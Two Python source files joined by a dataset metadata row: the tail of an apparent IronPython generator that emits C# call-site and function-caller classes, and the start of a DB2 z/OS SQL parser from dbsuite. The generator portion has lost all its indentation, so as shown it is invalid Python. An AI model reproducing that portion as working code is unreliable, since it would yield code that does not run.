'argCount' : i,
'defaultArgs' : ', '.join(('pyfunc.Defaults[defaultIndex + %d]' % curDefault for curDefault in range(i))),
'genFuncArgs' : make_calltarget_type_args(i),
})
function_caller_switch_template = """case %(argCount)d:
callerType = typeof(FunctionCaller<%(arity)s>).MakeGenericType(typeParams);
mi = callerType.GetMethod(baseName + "Call%(argCount)d");
Debug.Assert(mi != null);
fc = GetFunctionCaller(callerType, funcCompat);
funcType = typeof(Func<,,,,%(arity)s>).MakeGenericType(allParams);
return new Binding.FastBindResult<T>((T)(object)mi.CreateDelegate(funcType, fc), true);"""
def function_caller_switch(cw):
for nparams in range(1, MAX_ARGS-2):
cw.write(function_caller_switch_template % {
'arity' : ',' * (nparams - 1),
'argCount' : nparams,
})
def gen_lazy_call_targets(cw):
for nparams in range(MAX_ARGS):
cw.enter_block("public static object OriginalCallTarget%d(%s)" % (nparams, make_params(nparams, "PythonFunction function")))
cw.write("function.__code__.LazyCompileFirstTarget(function);")
cw.write("return ((Func<%s>)function.__code__.Target)(%s);" % (make_calltarget_type_args(nparams), gen_args_call(nparams, 'function')))
cw.exit_block()
cw.write('')
def gen_recursion_checks(cw):
for nparams in range(MAX_ARGS):
cw.enter_block("internal class PythonFunctionRecursionCheck%d" % (nparams, ))
cw.write("private readonly Func<%s> _target;" % (make_calltarget_type_args(nparams), ))
cw.write('')
cw.enter_block('public PythonFunctionRecursionCheck%d(Func<%s> target)' % (nparams, make_calltarget_type_args(nparams)))
cw.write('_target = target;')
cw.exit_block()
cw.write('')
cw.enter_block('public object CallTarget(%s)' % (make_params(nparams, "PythonFunction/*!*/ function"), ))
cw.write('PythonOps.FunctionPushFrame((PythonContext)function.Context.LanguageContext);')
cw.enter_block('try')
cw.write('return _target(%s);' % (gen_args_call(nparams, 'function'), ))
cw.finally_block()
cw.write('PythonOps.FunctionPopFrame();')
cw.exit_block()
cw.exit_block()
cw.exit_block()
cw.write('')
def gen_recursion_delegate_switch(cw):
for nparams in range(MAX_ARGS):
cw.case_label('case %d:' % nparams)
cw.write('finalTarget = new Func<%s>(new PythonFunctionRecursionCheck%d((Func<%s>)finalTarget).CallTarget);' % (make_calltarget_type_args(nparams), nparams, make_calltarget_type_args(nparams)))
cw.write('break;')
cw.dedent()
def get_call_type(postfix):
if postfix == "": return "CallType.None"
else: return "CallType.ImplicitInstance"
def make_call_to_target(cw, index, postfix, extraArg):
cw.enter_block("public override object Call%(postfix)s(%(params)s)", postfix=postfix,
params=make_params1(index))
cw.write("if (target%(index)d != null) return target%(index)d(%(args)s);", index=index,
args = make_args1(index, extraArg))
cw.write("throw BadArgumentError(%(callType)s, %(nargs)d);", callType=get_call_type(postfix), nargs=index)
cw.exit_block()
def make_call_to_targetX(cw, index, postfix, extraArg):
cw.enter_block("public override object Call%(postfix)s(%(params)s)", postfix=postfix,
params=make_params1(index))
cw.write("return target%(index)d(%(args)s);", index=index, args = make_args1(index, extraArg))
cw.exit_block()
def make_error_calls(cw, index):
cw.enter_block("public override object Call(%(params)s)", params=make_params1(index))
cw.write("throw BadArgumentError(CallType.None, %(nargs)d);", nargs=index)
cw.exit_block()
if index > 0:
cw.enter_block("public override object CallInstance(%(params)s)", params=make_params1(index))
cw.write("throw BadArgumentError(CallType.ImplicitInstance, %(nargs)d);", nargs=index)
cw.exit_block()
def gen_call(nargs, nparams, cw, extra=None):
    args = (extra or []) + ["arg%d" % i for i in range(nargs)]
cw.enter_block("public override object Call(%s)" % make_params1(nargs))
# first emit error checking...
ndefaults = nparams-nargs
if nargs != nparams:
cw.write("if (Defaults.Length < %d) throw BadArgumentError(%d);" % (ndefaults,nargs))
# emit the common case of no recursion check
if (nargs == nparams):
cw.write("if (!EnforceRecursion) return target(%s);" % ", ".join(args))
else:
dargs = args + ["Defaults[Defaults.Length - %d]" % i for i in range(ndefaults, 0, -1)]
cw.write("if (!EnforceRecursion) return target(%s);" % ", ".join(dargs))
# emit non-common case of recursion check
cw.write("PushFrame();")
cw.enter_block("try")
# make function body
if (nargs == nparams):
cw.write("return target(%s);" % ", ".join(args))
else:
dargs = args + ["Defaults[Defaults.Length - %d]" % i for i in range(ndefaults, 0, -1)]
cw.write("return target(%s);" % ", ".join(dargs))
cw.finally_block()
cw.write("PopFrame();")
cw.exit_block()
cw.exit_block()
def gen_params_callN(cw, any):
cw.enter_block("public override object Call(CodeContext context, params object[] args)")
cw.write("if (!IsContextAware) return Call(args);")
cw.write("")
cw.enter_block("if (Instance == null)")
cw.write("object[] newArgs = new object[args.Length + 1];")
cw.write("newArgs[0] = context;")
cw.write("Array.Copy(args, 0, newArgs, 1, args.Length);")
cw.write("return Call(newArgs);")
cw.else_block()
# need to call w/ Context, Instance, *args
if any:
cw.enter_block("switch (args.Length)")
for i in range(MAX_ARGS-1):
if i == 0:
cw.write(("case %d: if(target2 != null) return target2(context, Instance); break;") % (i))
else:
cw.write(("case %d: if(target%d != null) return target%d(context, Instance, " + gen_args_paramscall(i) + "); break;") % (i, i+2, i+2))
cw.exit_block()
cw.enter_block("if (targetN != null)")
cw.write("object [] newArgs = new object[args.Length+2];")
cw.write("newArgs[0] = context;")
cw.write("newArgs[1] = Instance;")
cw.write("Array.Copy(args, 0, newArgs, 2, args.Length);")
cw.write("return targetN(newArgs);")
cw.exit_block()
cw.write("throw BadArgumentError(args.Length);")
cw.exit_block()
else:
cw.write("object [] newArgs = new object[args.Length+2];")
cw.write("newArgs[0] = context;")
cw.write("newArgs[1] = Instance;")
cw.write("Array.Copy(args, 0, newArgs, 2, args.Length);")
cw.write("return target(newArgs);")
cw.exit_block()
cw.exit_block()
cw.write("")
CODE = """
public static object Call(%(params)s) {
FastCallable fc = func as FastCallable;
if (fc != null) return fc.Call(%(args)s);
return PythonCalls.Call(func, %(argsArray)s);
}"""
def gen_python_switch(cw):
for nparams in range(MAX_ARGS):
genArgs = make_calltarget_type_args(nparams)
cw.write("""case %d:
originalTarget = (Func<%s>)OriginalCallTarget%d;
return typeof(Func<%s>);""" % (nparams, genArgs, nparams, genArgs))
fast_type_call_template = """
class FastBindingBuilder<%(typeParams)s> : FastBindingBuilderBase {
public FastBindingBuilder(CodeContext context, PythonType type, PythonInvokeBinder binder, Type siteType, Type[] genTypeArgs) :
base(context, type, binder, siteType, genTypeArgs) {
}
protected override Delegate GetNewSiteDelegate(PythonInvokeBinder binder, object func) {
return new Func<%(newInitDlgParams)s>(new NewSite<%(typeParams)s>(binder, func).Call);
}
protected override Delegate MakeDelegate(int version, Delegate newDlg, LateBoundInitBinder initBinder) {
return new Func<%(funcParams)s>(
new FastTypeSite<%(typeParams)s>(
version,
(Func<%(newInitDlgParams)s>)newDlg,
initBinder
).CallTarget
);
}
}
class FastTypeSite<%(typeParams)s> {
private readonly int _version;
private readonly Func<%(newInitDlgParams)s> _new;
private readonly CallSite<Func<%(nestedSlowSiteParams)s>> _initSite;
public FastTypeSite(int version, Func<%(newInitDlgParams)s> @new, LateBoundInitBinder initBinder) {
_version = version;
_new = @new;
_initSite = CallSite<Func<%(nestedSlowSiteParams)s>>.Create(initBinder);
}
public object CallTarget(CallSite site, CodeContext context, object type, %(callTargetArgs)s) {
PythonType pt = type as PythonType;
if (pt != null && pt.Version == _version) {
object res = _new(context, type, %(callTargetPassedArgs)s);
_initSite.Target(_initSite, context, res, %(callTargetPassedArgs)s);
return res;
}
return ((CallSite<Func<%(funcParams)s>>)site).Update(site, context, type, %(callTargetPassedArgs)s);
}
}
class NewSite<%(typeParams)s> {
private readonly CallSite<Func<%(nestedSiteParams)s>> _site;
private readonly object _target;
public NewSite(PythonInvokeBinder binder, object target) {
_site = CallSite<Func<%(nestedSiteParams)s>>.Create(binder);
_target = target;
}
public object Call(CodeContext context, object typeOrInstance, %(callTargetArgs)s) {
return _site.Target(_site, context, _target, typeOrInstance, %(callTargetPassedArgs)s);
}
}
"""
def gen_fast_type_callers(cw):
for nparams in range(1, 6):
funcParams = 'CallSite, CodeContext, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
newInitDlgParams = 'CodeContext, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
callTargetArgs = ', '.join(('T%d arg%d' % (d, d) for d in range(nparams)))
callTargetPassedArgs = ', '.join(('arg%d' % (d, ) for d in range(nparams)))
nestedSiteParams = 'CallSite, CodeContext, object, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
nestedSlowSiteParams = 'CallSite, CodeContext, object, ' + ', '.join(('T%d' % d for d in range(nparams))) + ', object'
cw.write(fast_type_call_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'funcParams' : funcParams,
'newInitDlgParams' : newInitDlgParams,
'callTargetArgs' : callTargetArgs,
'callTargetPassedArgs': callTargetPassedArgs,
'nestedSiteParams' : nestedSiteParams,
'nestedSlowSiteParams' : nestedSlowSiteParams,
})
def gen_fast_type_caller_switch(cw):
for nparams in range(1, 6):
cw.write('case %d: baseType = typeof(FastBindingBuilder<%s>); break;' % (nparams, (',' * (nparams - 1))))
fast_init_template = """
class FastInitSite<%(typeParams)s> {
private readonly int _version;
private readonly PythonFunction _slot;
private readonly CallSite<Func<CallSite, CodeContext, PythonFunction, object, %(typeParams)s, object>> _initSite;
public FastInitSite(int version, PythonInvokeBinder binder, PythonFunction target) {
_version = version;
_slot = target;
_initSite = CallSite<Func<CallSite, CodeContext, PythonFunction, object, %(typeParams)s, object>>.Create(binder);
}
public object CallTarget(CallSite site, CodeContext context, object inst, %(callParams)s) {
IPythonObject pyObj = inst as IPythonObject;
if (pyObj != null && pyObj.PythonType.Version == _version) {
_initSite.Target(_initSite, context, _slot, inst, %(callArgs)s);
return inst;
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, inst, %(callArgs)s);
}
public object EmptyCallTarget(CallSite site, CodeContext context, object inst, %(callParams)s) {
IPythonObject pyObj = inst as IPythonObject;
if ((pyObj != null && pyObj.PythonType.Version == _version) || DynamicHelpers.GetPythonType(inst).Version == _version) {
return inst;
}
return ((CallSite<Func<CallSite, CodeContext, object, %(typeParams)s, object>>)site).Update(site, context, inst, %(callArgs)s);
}
}
"""
MAX_FAST_INIT_ARGS = 6
def gen_fast_init_callers(cw):
for nparams in range(1, MAX_FAST_INIT_ARGS):
callParams = ', '.join(('T%d arg%d' % (d, d) for d in range(nparams)))
callArgs = ', '.join(('arg%d' % (d, ) for d in range(nparams)))
cw.write(fast_init_template % {
'typeParams' : ', '.join(('T%d' % d for d in range(nparams))),
'callParams' : callParams,
'callArgs': callArgs,
})
def gen_fast_init_switch(cw):
for nparams in range(1, MAX_FAST_INIT_ARGS):
cw.write("case %d: initSiteType = typeof(FastInitSite<%s>); break;" % (nparams, ',' * (nparams-1), ))
def gen_fast_init_max_args(cw):
cw.write("public const int MaxFastLateBoundInitArgs = %d;" % MAX_FAST_INIT_ARGS)
MAX_INSTRUCTION_PROVIDED_CALLS = 7
def gen_call_expression_instruction_switch(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
cw.case_label('case %d:' % i)
cw.write('compiler.Compile(Parent.LocalContext);')
cw.write('compiler.Compile(_target);')
for j in range(i):
cw.write('compiler.Compile(_args[%d].Expression);' % j)
cw.write('compiler.Instructions.Emit(new Invoke%dInstruction(Parent.PyContext));' % i)
cw.write('return;')
cw.dedent()
def gen_call_expression_instructions(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
siteargs = 'object, ' * (i + 1)
argfetch = '\n'.join([' var arg%d = frame.Pop();' % (j-1) for j in range(i, 0, -1)])
callargs = ', '.join(['target'] + ['arg%d' % j for j in range(i)])
cw.write("""
class Invoke%(argcount)dInstruction : InvokeInstruction {
private readonly CallSite<Func<CallSite, CodeContext, %(siteargs)sobject>> _site;
public Invoke%(argcount)dInstruction(PythonContext context) {
_site = context.CallSite%(argcount)d;
}
public override int ConsumedStack {
get {
return %(consumedCount)d;
}
}
public override int Run(InterpretedFrame frame) {
%(argfetch)s
var target = frame.Pop();
frame.Push(_site.Target(_site, (CodeContext)frame.Pop(), %(callargs)s));
return +1;
}
}""" % {'siteargs': siteargs, 'argfetch' : argfetch, 'callargs' : callargs, 'argcount' : i, 'consumedCount' : i + 2 })
def gen_shared_call_sites_storage(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
siteargs = 'object, ' * (i + 1)
cw.writeline('private CallSite<Func<CallSite, CodeContext, %sobject>> _callSite%d;' % (siteargs, i))
def gen_shared_call_sites_properties(cw):
for i in range(MAX_INSTRUCTION_PROVIDED_CALLS):
siteargs = 'object, ' * (i + 1)
cw.enter_block('internal CallSite<Func<CallSite, CodeContext, %sobject>> CallSite%d' % (siteargs, i))
cw.enter_block('get')
cw.writeline('EnsureCall%dSite();' % i)
cw.writeline('return _callSite%d;' % i)
cw.exit_block()
cw.exit_block()
cw.writeline('')
cw.enter_block('private void EnsureCall%dSite()' % i)
cw.enter_block('if (_callSite%d == null)' % i)
cw.writeline('Interlocked.CompareExchange(')
cw.indent()
cw.writeline('ref _callSite%d,' % i)
cw.writeline('CallSite<Func<CallSite, CodeContext, %sobject>>.Create(Invoke(new CallSignature(%d))),' % (siteargs, i))
cw.writeline('null')
cw.dedent()
cw.writeline(');')
cw.exit_block()
cw.exit_block()
cw.writeline('')
def main():
return generate(
("Python Selfless Method Caller Switch", selfless_method_caller_switch),
("Python Method Callers", method_callers),
("Python Shared Call Sites Properties", gen_shared_call_sites_properties),
("Python Shared Call Sites Storage", gen_shared_call_sites_storage),
("Python Call Expression Instructions", gen_call_expression_instructions),
("Python Call Expression Instruction Switch", gen_call_expression_instruction_switch),
("Python Fast Init Max Args", gen_fast_init_max_args),
("Python Fast Init Switch", gen_fast_init_switch),
("Python Fast Init Callers", gen_fast_init_callers),
("Python Fast Type Caller Switch", gen_fast_type_caller_switch),
("Python Fast Type Callers", gen_fast_type_callers),
("Python Recursion Enforcement", gen_recursion_checks),
("Python Recursion Delegate Switch", gen_recursion_delegate_switch),
("Python Lazy Call Targets", gen_lazy_call_targets),
("Python Zero Arg Function Callers", function_callers_0),
("Python Function Callers", function_callers),
("Python Function Caller Switch", function_caller_switch),
("Python Call Target Switch", gen_python_switch),
)
if __name__ == "__main__":
main()
| apache-2.0 | 6,270,476,123,638,950,000 | 42.056013 | 201 | 0.601033 | false |
waveform80/dbsuite | dbsuite/plugins/db2/zos/parser.py | 1 | 412770 | # vim: set et sw=4 sts=4:
# Copyright 2012 Dave Hughes.
#
# This file is part of dbsuite.
#
# dbsuite is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# dbsuite is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# dbsuite. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
from collections import namedtuple
from dbsuite.plugins.db2.zos.tokenizer import db2zos_namechars, db2zos_identchars
from dbsuite.parser import BaseParser, ParseError, ParseBacktrack, quote_str
from dbsuite.tokenizer import TokenTypes as TT, Token
# Standard size suffixes and multipliers
SUFFIX_KMG = {
'K': 1024**1,
'M': 1024**2,
'G': 1024**3,
}
# Default sizes for certain datatypes
CHAR_DEFAULT_SIZE = 1
BLOB_DEFAULT_SIZE = 1024*1024
DECIMAL_DEFAULT_SIZE = 5
DECIMAL_DEFAULT_SCALE = 0
DECFLOAT_DEFAULT_SIZE = 34
TIMESTAMP_DEFAULT_SIZE = 6
class DB2ZOSParser(BaseParser):
"""Reformatter which breaks up and re-indents DB2 for LUW's SQL dialect.
This class is, at its core, a full blown SQL language parser that
understands many common SQL DML and DDL commands (from the basic ones like
INSERT, UPDATE, DELETE, SELECT, to the more DB2 specific ones such as
CREATE TABLESPACE, CREATE FUNCTION, and dynamic compound statements).
"""
def __init__(self):
super(DB2ZOSParser, self).__init__()
self.namechars = db2zos_namechars
self.identchars = db2zos_identchars
self.current_schema = None
def _parse_init(self, tokens):
super(DB2ZOSParser, self)._parse_init(tokens)
self.current_schema = None
def _save_state(self):
# Override _save_state to save the current schema
self._states.append((
self._index,
self._level,
len(self._output),
self.current_schema
))
def _restore_state(self):
# Override _restore_state to restore the current schema
(
self._index,
self._level,
output_len,
self.current_schema
) = self._states.pop()
del self._output[output_len:]
def _parse_top(self):
# Override _parse_top to make a 'statement' the top of the parse tree
self._parse_statement()
def _prespace_default(self, template):
# Overridden to include array and set operators, and the specific
# intra-statement terminator used by func/proc definitions
return super(DB2ZOSParser, self)._prespace_default(template) and template not in (
']', '}', ';',
(TT.OPERATOR, ']'),
(TT.OPERATOR, '}'),
(TT.TERMINATOR, ';'),
)
def _postspace_default(self, template):
# Overridden to include array and set operators
return super(DB2ZOSParser, self)._postspace_default(template) and template not in (
'[', '{',
(TT.OPERATOR, '['),
(TT.OPERATOR, '{'),
)
# PATTERNS ###############################################################
def _parse_subrelation_name(self):
"""Parses the (possibly qualified) name of a relation-owned object.
A relation-owned object is either a column or a constraint. This method
parses such a name with up to two optional qualifiers (e.g., it is
possible in a SELECT statement with no table correlation clauses to
specify SCHEMA.TABLE.COLUMN). The method returns the parsed name as a
tuple with 3 elements (None is used for qualifiers which are missing).
"""
token1 = self._expect(TT.IDENTIFIER)
result = (None, None, token1.value)
if self._match('.'):
self._update_output(Token(TT.RELATION, token1.value, token1.source, token1.line, token1.column), -2)
token2 = self._expect(TT.IDENTIFIER)
result = (None, result[2], token2.value)
if self._match('.'):
self._update_output(Token(TT.SCHEMA, token1.value, token1.source, token1.line, token1.column), -4)
self._update_output(Token(TT.RELATION, token2.value, token2.source, token2.line, token2.column), -2)
token3 = self._expect(TT.IDENTIFIER)
result = (result[1], result[2], token3.value)
return result
_parse_column_name = _parse_subrelation_name
_parse_constraint_name = _parse_subrelation_name
# These are cheats; remote object names consist of server.schema.object
# instead of schema.relation.object, and source object names consist of
# schema.package.object, but they'll do
_parse_remote_object_name = _parse_subrelation_name
_parse_source_object_name = _parse_subrelation_name
# These are also cheats; routine, type and variables names as of 9.7 are
# either [schema.]routine (1 or 2-part) or schema.module.routine (3-part)
_parse_function_name = _parse_subrelation_name
_parse_procedure_name = _parse_subrelation_name
_parse_method_name = _parse_subrelation_name
_parse_type_name = _parse_subrelation_name
_parse_variable_name = _parse_subrelation_name
def _parse_subschema_name(self):
"""Parses the (possibly qualified) name of a schema-owned object.
A schema-owned object is a table, view, index, function, sequence, etc.
This method parses such a name with an optional qualifier (the schema
name). The method returns the parsed name as a tuple with 2 elements
(None is used for the schema qualifier if it is missing).
"""
token1 = self._expect(TT.RELATION)
result = (None, token1.value)
if self._match('.'):
self._update_output(Token(TT.SCHEMA, token1.value, token1.source, token1.line, token1.column), -2)
token2 = self._expect(TT.RELATION)
result = (result[1], token2.value)
return result
_parse_relation_name = _parse_subschema_name
_parse_table_name = _parse_subschema_name
_parse_view_name = _parse_subschema_name
_parse_alias_name = _parse_subschema_name
_parse_nickname_name = _parse_subschema_name
_parse_trigger_name = _parse_subschema_name
_parse_index_name = _parse_subschema_name
_parse_routine_name = _parse_subschema_name
_parse_module_name = _parse_subschema_name
_parse_sequence_name = _parse_subschema_name
# Another cheat; security labels exist within a security policy
_parse_security_label_name = _parse_subschema_name
def _parse_size(self, optional=False, suffix={}):
"""Parses a parenthesized size with an optional scale suffix.
This method parses a parenthesized integer number. The optional
parameter controls whether an exception is raised if an opening
parenthesis is not encountered at the current input position. The
suffix parameter is a dictionary mapping suffix->multiplier. The global
constant SUFFIX_KMG defines a commonly used suffix mapping (K->1024,
M->1024**2, etc.)
"""
if optional:
if not self._match('(', prespace=False):
return None
else:
self._expect('(', prespace=False)
size = self._expect(TT.NUMBER)[1]
if suffix:
suf = self._match_one_of(suffix.keys())
if suf:
size *= suffix[suf[1]]
self._expect(')')
return size
def _parse_special_register(self):
"""Parses a special register (e.g. CURRENT_DATE)"""
if self._match((TT.REGISTER, 'CURRENT')):
if self._match((TT.REGISTER, 'TIMESTAMP')):
if self._match('('):
self._expect_sequence([TT.INTEGER, ')'])
elif self._match_one_of([
(TT.REGISTER, 'CLIENT_ACCTNG'),
(TT.REGISTER, 'CLIENT_APPLNAME'),
(TT.REGISTER, 'CLIENT_USERID'),
(TT.REGISTER, 'CLIENT_WRKSTNNAME'),
(TT.REGISTER, 'DATE'),
(TT.REGISTER, 'DBPARTITIONNUM'),
(TT.REGISTER, 'DEGREE'),
(TT.REGISTER, 'ISOLATION'),
(TT.REGISTER, 'NODE'),
(TT.REGISTER, 'PATH'),
(TT.REGISTER, 'SCHEMA'),
(TT.REGISTER, 'SERVER'),
(TT.REGISTER, 'SQLID'),
(TT.REGISTER, 'TIME'),
(TT.REGISTER, 'TIMEZONE'),
(TT.REGISTER, 'USER'),
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'DECFLOAT'),
(TT.REGISTER, 'ROUNDING'),
(TT.REGISTER, 'MODE')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'DEFAULT'),
(TT.REGISTER, 'TRANSFORM'),
(TT.REGISTER, 'GROUP')
]):
pass
elif self._match((TT.REGISTER, 'EXPLAIN')):
self._expect_one_of([
(TT.REGISTER, 'MODE'),
(TT.REGISTER, 'SNAPSHOT')
])
elif self._match_sequence([
(TT.REGISTER, 'FEDERATED'),
(TT.REGISTER, 'ASYNCHRONY')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'IMPLICIT'),
(TT.REGISTER, 'XMLPARSE'),
(TT.REGISTER, 'OPTION')]
):
pass
elif self._match_sequence([
(TT.REGISTER, 'LOCALE'),
(TT.REGISTER, 'LC_MESSAGES')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'LOCALE'),
(TT.REGISTER, 'LC_TIME')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'LOCK'),
(TT.REGISTER, 'TIMEOUT')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'MAINTAINED'),
(TT.REGISTER, 'TABLE'),
(TT.REGISTER, 'TYPES'),
(TT.REGISTER, 'FOR'),
(TT.REGISTER, 'OPTIMIZATION')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'MDC'),
(TT.REGISTER, 'ROLLOUT'),
(TT.REGISTER, 'MODE')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'OPTIMIZATION'),
(TT.REGISTER, 'PROFILE')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'PACKAGE'),
(TT.REGISTER, 'PATH')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'QUERY'),
(TT.REGISTER, 'OPTIMIZATION')
]):
pass
elif self._match_sequence([
(TT.REGISTER, 'REFRESH'),
(TT.REGISTER, 'AGE')
]):
pass
else:
self._expected((TT.REGISTER,))
elif self._match((TT.REGISTER, 'CLIENT')):
self._expect_one_of([
(TT.REGISTER, 'ACCTNG'),
(TT.REGISTER, 'APPLNAME'),
(TT.REGISTER, 'USERID'),
(TT.REGISTER, 'WRKSTNNAME'),
])
elif self._match((TT.REGISTER, 'CURRENT_TIMESTAMP')):
if self._match('('):
self._expect_sequence([TT.INTEGER, ')'])
else:
self._expect_one_of([
(TT.REGISTER, 'CURRENT_DATE'),
(TT.REGISTER, 'CURRENT_PATH'),
(TT.REGISTER, 'CURRENT_SCHEMA'),
(TT.REGISTER, 'CURRENT_SERVER'),
(TT.REGISTER, 'CURRENT_TIME'),
(TT.REGISTER, 'CURRENT_TIMEZONE'),
(TT.REGISTER, 'CURRENT_USER'),
(TT.REGISTER, 'SESSION_USER'),
(TT.REGISTER, 'SYSTEM_USER'),
(TT.REGISTER, 'USER'),
])
def _parse_datatype(self):
"""Parses a (possibly qualified) data type with optional arguments.
Parses a data type name with an optional qualifier (the schema name).
The method returns a tuple with the following structure:
(schema_name, type_name, size, scale)
If the type has no parameters size and/or scale may be None. If the
schema is not specified, schema_name is None, unless the type is a
builtin type in which case the schema_name will always be 'SYSIBM'
regardless of whether a schema was specified with the type in the
source.
"""
self._save_state()
try:
# Try and parse a built-in type
typeschema = 'SYSIBM'
size = None
scale = None
# Match the optional SYSIBM prefix
if self._match((TT.DATATYPE, 'SYSIBM')):
self._expect('.')
if self._match((TT.DATATYPE, 'SMALLINT')):
typename = 'SMALLINT'
elif self._match_one_of([(TT.DATATYPE, 'INT'), (TT.DATATYPE, 'INTEGER')]):
typename = 'INTEGER'
elif self._match((TT.DATATYPE, 'BIGINT')):
typename = 'BIGINT'
elif self._match((TT.DATATYPE, 'FLOAT')):
size = self._parse_size(optional=True)
if size is None or size > 24:
typename = 'DOUBLE'
else:
typename = 'REAL'
elif self._match((TT.DATATYPE, 'REAL')):
typename = 'REAL'
elif self._match((TT.DATATYPE, 'DOUBLE')):
self._match((TT.DATATYPE, 'PRECISION'))
typename = 'DOUBLE'
elif self._match((TT.DATATYPE, 'DECFLOAT')):
typename = 'DECFLOAT'
                size = self._parse_size(optional=True) or DECFLOAT_DEFAULT_SIZE
elif self._match_one_of([(TT.DATATYPE, 'DEC'), (TT.DATATYPE, 'DECIMAL')]):
typename = 'DECIMAL'
size = DECIMAL_DEFAULT_SIZE
scale = DECIMAL_DEFAULT_SCALE
if self._match('(', prespace=False):
size = self._expect(TT.NUMBER).value
if self._match(','):
scale = self._expect(TT.NUMBER).value
self._expect(')')
elif self._match_one_of([(TT.DATATYPE, 'NUM'), (TT.DATATYPE, 'NUMERIC')]):
typename = 'NUMERIC'
size = DECIMAL_DEFAULT_SIZE
scale = DECIMAL_DEFAULT_SCALE
if self._match('(', prespace=False):
size = self._expect(TT.NUMBER).value
if self._match(','):
scale = self._expect(TT.NUMBER).value
self._expect(')')
elif self._match_one_of([(TT.DATATYPE, 'CHAR'), (TT.DATATYPE, 'CHARACTER')]):
if self._match((TT.DATATYPE, 'VARYING')):
typename = 'VARCHAR'
size = self._parse_size(optional=False, suffix=SUFFIX_KMG)
self._match_sequence(['FOR', 'BIT', 'DATA'])
elif self._match_sequence([(TT.DATATYPE, 'LARGE'), (TT.DATATYPE, 'OBJECT')]):
typename = 'CLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
else:
typename = 'CHAR'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or CHAR_DEFAULT_SIZE
self._match_sequence(['FOR', 'BIT', 'DATA'])
elif self._match((TT.DATATYPE, 'VARCHAR')):
typename = 'VARCHAR'
size = self._parse_size(optional=False, suffix=SUFFIX_KMG)
self._match_sequence(['FOR', 'BIT', 'DATA'])
elif self._match((TT.DATATYPE, 'VARGRAPHIC')):
typename = 'VARGRAPHIC'
size = self._parse_size(optional=False)
elif self._match_sequence([(TT.DATATYPE, 'LONG'), (TT.DATATYPE, 'VARCHAR')]):
typename = 'LONG VARCHAR'
elif self._match_sequence([(TT.DATATYPE, 'LONG'), (TT.DATATYPE, 'VARGRAPHIC')]):
typename = 'LONG VARGRAPHIC'
elif self._match((TT.DATATYPE, 'CLOB')):
typename = 'CLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'BLOB')):
typename = 'BLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match_sequence([(TT.DATATYPE, 'BINARY'), (TT.DATATYPE, 'LARGE'), (TT.DATATYPE, 'OBJECT')]):
typename = 'BLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'DBCLOB')):
typename = 'DBCLOB'
size = self._parse_size(optional=True, suffix=SUFFIX_KMG) or BLOB_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'GRAPHIC')):
typename = 'GRAPHIC'
size = self._parse_size(optional=True) or CHAR_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'NCHAR')):
typename = 'NCHAR'
if self._match((TT.DATATYPE, 'VARYING')):
typename = 'NVARCHAR'
size = self._parse_size(optional=False)
else:
typename = 'NCHAR'
size = self._parse_size(optional=True) or CHAR_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'NATIONAL')):
self._expect_one_of([(TT.DATATYPE, 'CHAR'), (TT.DATATYPE, 'CHARACTER')])
if self._match((TT.DATATYPE, 'VARYING')):
typename = 'NVARCHAR'
size = self._parse_size(optional=False)
else:
typename = 'NCHAR'
size = self._parse_size(optional=True) or CHAR_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'DATE')):
typename = 'DATE'
elif self._match((TT.DATATYPE, 'TIME')):
typename = 'TIME'
elif self._match((TT.DATATYPE, 'TIMESTAMP')):
typename = 'TIMESTAMP'
size = self._parse_size(optional=True) or TIMESTAMP_DEFAULT_SIZE
elif self._match((TT.DATATYPE, 'DATALINK')):
typename = 'DATALINK'
size = self._parse_size(optional=True)
elif self._match((TT.DATATYPE, 'XML')):
typename = 'XML'
elif self._match((TT.DATATYPE, 'DB2SECURITYLABEL')):
typeschema = 'SYSPROC'
typename = 'DB2SECURITYLABEL'
elif self._match((TT.DATATYPE, 'BOOLEAN')):
typename = 'BOOLEAN'
elif self._match((TT.DATATYPE, 'CURSOR')):
typename = 'CURSOR'
elif self._match((TT.DATATYPE, 'ARRAY')):
typename = 'ARRAY'
size = self._parse_size(optional=False, suffix=SUFFIX_KMG)
else:
raise ParseBacktrack()
except ParseError:
# If that fails, rewind and parse a user-defined type (user defined
# types do not have a size or scale)
self._restore_state()
typeschema = None
typename = self._expect(TT.DATATYPE).value
if self._match('.'):
typeschema = typename
typename = self._expect(TT.DATATYPE).value
size = None
